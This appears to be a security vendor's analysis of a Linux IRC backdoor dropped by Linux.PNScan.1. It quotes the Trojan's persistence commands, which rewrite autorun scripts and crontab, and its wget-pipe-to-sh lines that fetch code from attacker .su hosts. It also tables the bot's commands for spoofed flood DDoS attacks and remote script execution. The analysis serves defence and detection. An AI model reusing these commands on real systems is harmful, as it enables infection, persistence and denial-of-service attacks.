SHA1:
- e8a8d48e1083e7146d5efcba1d6490f05cd8c897 (unpacked)
- 577551c6a550c3fd30169fb4c2a62fa8b6e73686 (packed)
Backdoors for Linux OSes that get installed on the system by Linux.PNScan.1. Once launched, the Trojan attempts to ensure its autorun as follows:
system("echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &");
system("rm -rf /var/run/wgs* > /dev/null 2>&1 &");
system("rm -rf /var/run/bbs* > /dev/null 2>&1 &");
system("rm -rf /var/run/tty* > /dev/null 2>&1 &");
system("ulimit -s unlimited > /dev/null 2>&1 &");
system("mount -t ext2 /dev/mtdblock4 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/mtdblock5 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdx6 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdc6 /tmp/config > /dev/null 2>&1");
system("rm -rf /var/run/getty1 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty2 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty3 > /dev/null 2>&1 &");
system("cat /tmp/config/autorun.sh | grep -v \"nameserver 8.8.8.8\" | grep -v \"sleep 43200\" | grep -v \"erpcit\" | grep -v \"o.kei\" > /var/run/.backup");
system("echo \"echo \"nameserver 8.8.8.8\" > /etc/resolv.conf\" >> /var/run/.backup");
system("echo \"sleep 120 && wget -qO - http://*.***.su/qn | sh > /dev/null 2>&1 &\" >> /var/run/.backup");
system("cat /var/run/.backup > /tmp/config/autorun.sh");
system("chmod +x /tmp/config/autorun.sh");
system("umount /tmp/config");
system("rm -rf /var/run/.backup");
system("cat /etc/config/crontab | grep -v \"gettychk\" > /tmp/.fuckw");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckw");
system("cat /tmp/.fuckw > /etc/config/crontab");
system("crontab -l | grep -v \"gettychk\" > /var/run/.fuckx");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckx");
system("echo \"#!/bin/sh\" > /var/run/gettychk");
system("echo \"pidof getty0 || ( rm -rf /var/run/getty.pid && /var/run/getty0 ) \" >> /var/run/gettychk");
system("chmod 700 /var/run/gettychk");
system("crontab /var/run/.fuckx");
system("crontab /etc/config/crontab");
system("rm -rf /var/run/.fuckw");
system("rm -rf /var/run/.fuckx");
system("/etc/init.d/crond.sh restart > /dev/null 2>&1 &");
system("wget -qO - http://*.***.su/botkill | sh > /dev/null 2>&1 &");To connect to the IRC server, the Trojan generates the name and alias string as follows:
x32|Linux|root|%c%c%c%c%c%c%c%c%cwhere %c indicates a random number from the "0123456789" set. If the backdoor does not have root privileges, the "unk" value is used in place of "root".
While establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:
| Command | Action | Comments |
|---|---|---|
| 352 | Set a fake IP | |
| 433 | Generate a new nickname | |
| ERROR | Generate a new nickname | |
| NICK | Take a string from the command as a nickname | |
| PING | Send PONG | |
| 376 | Join the channel | Send(fd, "NICK %s\n", nick); Send(fd, "MODE %s -xi\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
| 422 | Join the channel | Send(fd, "NICK %s\n", nick); Send(fd, "MODE %s -xi\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
| PRIVMSG | Execute a special command |
Moreover, the Trojan can execute a number of extended commands.
| Command | Action | Syntax |
|---|---|---|
| RANDOMFLOOD | Randomly switch between ACK and SYN Flood | RANDOMFLOOD <target> <port> <secs> |
| ACKFLOOD | ACK Flood (spoofed) | ACKFLOOD <target> <port> <secs> |
| SYNFLOOD | SYN Flood (spoofed) | SYNFLOOD <target> <port> <secs> |
| TSUNAMI | Launch a DDoS attack | TSUNAMI <target> <secs> |
| PAN | “Advanced” SYN Flood | PAN <target> <port> <secs> |
| SUDP | UDP Flood (spoofed) | SUDP <target> <port> <secs> |
| UDP | UDP Flood | UDP <target> <port> <secs> |
| NSACKFLOOD | ACK Flood | NSACKFLOOD <target> <port> <secs> |
| NSSYNFLOOD | SYN Flood | NSSYNFLOOD <target> <port> <secs> |
| STD | Launch a DDoS attack | STD <target> <port> <secs> |
| UNKNOWN | Launch a DDoS attack | UNKNOWN <target> <secs> (recommended for non-root users) |
| KILLALL | Terminate a DDoS attack | |
| DNS | Identify domain and send the server its IP | |
| CUSTOM | Execute a custom script (at the specified link) wget -qO - http://o.kei.su/custom | sh > /dev/null 2>&1 | |
| PATCH | Apply a patch against the shellshock vulnerability wget -qO - http://o.kei.su/patch | sh > /dev/null 2>&1 | |
| BOTKILL | Remove other Trojans wget -qO - http://o.kei.su/botkill | sh > /dev/null 2>&1 | |
| GETSPOOFS | Get spoofing parameters | |
| SPOOFS | Set an IP or an IP range for spoofing | SPOOFS <iprange/ip> |
| VERSION | Return backdoor's version | |
| SERVER | Change the server to the one specified in the command | |
| GET | Download a specified file | GET <url> <save as> |
| IRC | Send specified IRC commands to the server | IRC <arg1> <arg2> <arg...> |
| HELP | Display the list of available commands | |
| SH | Execute a set of SH commands | SH <arg1> <arg2> <arg...> |